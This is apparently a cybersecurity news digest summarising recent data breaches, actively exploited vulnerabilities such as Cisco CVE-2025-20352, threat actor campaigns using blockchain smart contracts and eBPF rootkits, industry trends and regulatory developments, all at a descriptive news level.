Major Incidents or Breaches

  • Sotheby’s disclosed a data breach in which threat actors accessed sensitive information, including financial details of individuals.
  • Financial services company Prosper suffered a breach impacting over 17.6 million accounts, with personal information stolen.
  • F5 confirmed a long-term breach of its systems, with attribution linked to Chinese threat actors. The attack exploited BIG-IP vulnerabilities, prompting patch releases and government alerts.
  • Video call app Huddle01 exposed over 600,000 user logs due to a misconfigured Kafka broker.
  • Fashion retailer Mango reported a data breach at a third-party marketing provider, exposing limited contact details.
  • LastPass and other top password managers are being targeted by phishing campaigns aiming to exploit user trust in password vaults.

Newly Discovered Vulnerabilities

  • Cisco IOS and IOS XE Software: CVE-2025-20352, a remote code execution vulnerability, is being actively exploited to deploy Linux rootkits on older networking devices.
  • Gladinet CentreStack: A local file inclusion vulnerability (CVE-2025-11371) has been exploited as a zero-day since late September; security updates have been released.
  • Adobe Experience Manager: A maximum-severity vulnerability in AEM Forms is being actively exploited to execute code on unpatched systems.
  • Fuji Electric HMI Configurator: Multiple vulnerabilities have been disclosed and patched, with advisories issued to industrial organizations.
  • Windows Kernel (Rust-based GDI component): A security vulnerability identified by Check Point Research in January 2025.
  • Microsoft Windows 11: Recent updates have broken HTTP/2 connections to localhost (127.0.0.1), impacting applications relying on this functionality.

Notable Threat Actor Activity

  • North Korean-affiliated actors are leveraging the EtherHiding technique to distribute malware and steal cryptocurrency, using blockchain smart contracts for resilience and stealth.
  • Financially motivated threat actor UNC5142 is abusing blockchain smart contracts to distribute information stealers such as Atomic (AMOS), Lumma, and RedLine via infected WordPress sites.
  • Chinese threat actors have been linked to the F5 breach and are reportedly testing AI-optimized attack chains in Taiwan.
  • Vanilla Tempest (aka Vice Spider/Vice Society) used over 200 fraudulent certificates to sign malicious binaries in Rhysida ransomware campaigns, targeting Microsoft Teams users. Microsoft has revoked these certificates to disrupt ongoing attacks.
  • Attackers are exploiting a Cisco SNMP flaw to deploy Linux rootkits (including the newly discovered LinkPro rootkit, which uses eBPF for stealth and activates via magic TCP packets) on AWS-hosted and on-premises infrastructure.

Trends, Tools, or Tactics of Interest

  • Increased abuse of blockchain technologies (smart contracts) for malware distribution and command-and-control, notably by both state-aligned and financially motivated actors.
  • Emergence of new Linux rootkits (e.g., LinkPro) employing advanced stealth techniques such as eBPF and covert activation mechanisms.
  • Phishing campaigns specifically targeting users of password managers, exploiting trust in these platforms.
  • Security risks in the software supply chain highlighted by the discovery of over 550 unique secrets exposed in Microsoft Visual Studio Code marketplaces.
  • AI-driven security tools are gaining traction, with new products emerging to automate vulnerability remediation and enterprise data protection.
  • Security Operations Centers (SOCs) are under pressure to adopt AI-based platforms for scaling detection and response capabilities.
  • Ongoing concerns regarding secure coding practices in AI-generated code, with emphasis on the need for improved training and oversight.

Regulatory or Policy Developments Affecting the Security Industry

  • Microsoft Office 2016 and Office 2019 have reached end of extended support as of October 14, 2025, with implications for continued security updates and compliance.
  • Regulatory scrutiny on data handling practices, as evidenced by allegations against Roku for collecting and selling children’s data in violation of privacy laws.
  • Financial institutions are facing increasing challenges in data governance and regulatory risk management amid evolving compliance requirements.